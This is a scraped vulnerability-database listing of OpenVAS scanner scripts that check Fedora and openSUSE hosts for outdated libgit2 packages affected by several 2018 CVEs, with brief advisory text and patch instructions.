libgit2 is a portable, pure C implementation of the Git core methods provided as a re-entrant linkable library with a solid API, allowing you to write native speed custom Git applications in any language with bindings.
{"openvas": [{"lastseen": "2019-05-29T18:32:58", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-08-10T00:00:00", "type": "openvas", "title": "Fedora Update for libgit2 FEDORA-2018-3e021c6c2e", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10888", "CVE-2018-11235", "CVE-2018-10887"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874915", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874915", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_3e021c6c2e_libgit2_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libgit2 FEDORA-2018-3e021c6c2e\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874915\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-08-10 06:22:30 +0200 (Fri, 10 Aug 2018)\");\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libgit2 FEDORA-2018-3e021c6c2e\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libgit2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"libgit2 on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-3e021c6c2e\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NAFODB7GRTYS4SCIO2GNYOE4NAC7AE3P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"libgit2\", rpm:\"libgit2~0.26.6~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-08-19T00:00:00", "type": "openvas", "title": "Fedora Update for libgit2 FEDORA-2018-ca483ae3e0", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10888", "CVE-2018-11235", "CVE-2018-10887"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874968", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874968", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_ca483ae3e0_libgit2_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libgit2 FEDORA-2018-ca483ae3e0\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874968\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-08-19 06:50:29 +0200 (Sun, 19 Aug 2018)\");\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libgit2 FEDORA-2018-ca483ae3e0\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libgit2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"libgit2 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-ca483ae3e0\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CM5WCC5TEFHVNXMJDTRRAD6VFTJLCDA4\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"libgit2\", rpm:\"libgit2~0.26.6~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:57", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-07-20T00:00:00", "type": "openvas", "title": "Fedora Update for libgit2 FEDORA-2018-4d253dc945", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10888", "CVE-2018-11235", "CVE-2018-10887"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874827", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874827", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_4d253dc945_libgit2_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libgit2 FEDORA-2018-4d253dc945\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874827\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-20 06:06:04 +0200 (Fri, 20 Jul 2018)\");\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libgit2 FEDORA-2018-4d253dc945\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libgit2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is\npresent on the target host.\");\n script_tag(name:\"affected\", value:\"libgit2 on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-4d253dc945\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2DI7CXOAS5SSCDPWYHUDJEDPVLTAFS6H\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"libgit2\", rpm:\"libgit2~0.26.5~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:08", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-07-20T00:00:00", "type": "openvas", "title": "Fedora Update for libgit2 FEDORA-2018-fb071377ba", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10888", "CVE-2018-11235", "CVE-2018-10887"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874830", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874830", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_fb071377ba_libgit2_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libgit2 FEDORA-2018-fb071377ba\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874830\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-20 06:06:27 +0200 (Fri, 20 Jul 2018)\");\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libgit2 FEDORA-2018-fb071377ba\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libgit2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"libgit2 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-fb071377ba\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5GAR2S4GMRIEBQXZU3D6ZDJQTR5C4MZH\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"libgit2\", rpm:\"libgit2~0.26.5~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:54", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-11-12T00:00:00", "type": "openvas", "title": "Fedora Update for libgit2 FEDORA-2018-f6c972fc06", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10888", "CVE-2018-11235", "CVE-2018-17456", "CVE-2018-10887"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310875251", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875251", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_f6c972fc06_libgit2_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libgit2 FEDORA-2018-f6c972fc06\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875251\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2018-17456\", \"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-11-12 06:20:22 +0100 (Mon, 12 Nov 2018)\");\n script_name(\"Fedora Update for libgit2 FEDORA-2018-f6c972fc06\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2018-f6c972fc06\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RWUYSQIRNA7BF3QIFK765ETPFQ6URXAE\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libgit2'\n package(s) announced via the FEDORA-2018-f6c972fc06 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"libgit2 on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"libgit2\", rpm:\"libgit2~0.26.8~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:03", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-11-12T00:00:00", "type": "openvas", "title": "Fedora Update for libgit2 FEDORA-2018-3448c8aec1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10888", "CVE-2018-11235", "CVE-2018-17456", "CVE-2018-10887"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310875257", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875257", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_3448c8aec1_libgit2_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libgit2 FEDORA-2018-3448c8aec1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875257\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2018-17456\", \"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-11-12 06:21:19 +0100 (Mon, 12 Nov 2018)\");\n script_name(\"Fedora Update for libgit2 FEDORA-2018-3448c8aec1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n script_xref(name:\"FEDORA\", value:\"2018-3448c8aec1\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WDTYHGBY3SFDXNHSJNH54FQEMJJLUZOI\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libgit2'\n package(s) announced via the FEDORA-2018-3448c8aec1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"libgit2 on Fedora 27.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"libgit2\", rpm:\"libgit2~0.26.8~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:59", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-10-17T00:00:00", "type": "openvas", "title": "Fedora Update for libgit2 FEDORA-2018-42eab0f5b9", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10888", "CVE-2018-11235", "CVE-2018-17456", "CVE-2018-10887"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310875204", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875204", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_42eab0f5b9_libgit2_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libgit2 FEDORA-2018-42eab0f5b9\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875204\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-17 06:44:35 +0200 (Wed, 17 Oct 2018)\");\n script_cve_id(\"CVE-2018-17456\", \"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libgit2 FEDORA-2018-42eab0f5b9\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libgit2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n script_tag(name:\"affected\", value:\"libgit2 on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-42eab0f5b9\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PKRWJ6IUL2V32F67UNPFRHEF5LEVL2IZ\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"libgit2\", rpm:\"libgit2~0.26.7~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T17:34:20", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-10-26T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for libgit2 (openSUSE-SU-2018:2502-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10888", "CVE-2018-11235", "CVE-2018-10887", "CVE-2018-15501"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852094", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852094", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852094\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\", \"CVE-2018-15501\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-10-26 06:47:24 +0200 (Fri, 26 Oct 2018)\");\n script_name(\"openSUSE: Security Advisory for libgit2 (openSUSE-SU-2018:2502-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:2502-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-08/msg00074.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libgit2'\n package(s) announced via the openSUSE-SU-2018:2502-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for libgit2 to version 0.26.5 fixes the following issues:\n\n The following security vulnerabilities were addressed:\n\n - CVE-2018-10887: Fixed an integer overflow which in turn leads to an out\n of bound read, allowing to read the base object, which could be\n exploited by an attacker to cause denial of service (DoS) (bsc#1100613).\n\n - CVE-2018-10888: Fixed an out-of-bound read while reading a binary delta\n file, which could be exploited by an attacker t ocause a denial of\n service (DoS) (bsc#1100612).\n\n - CVE-2018-11235: Fixed a remote code execution, which could occur with a\n crafted .gitmodules file (bsc#1095219)\n\n - CVE-2018-15501: Prevent out-of-bounds reads when processing\n smart-protocol 'ng' packets (bsc#1104641)\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2018-922=1\");\n\n script_tag(name:\"affected\", value:\"libgit2 on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", 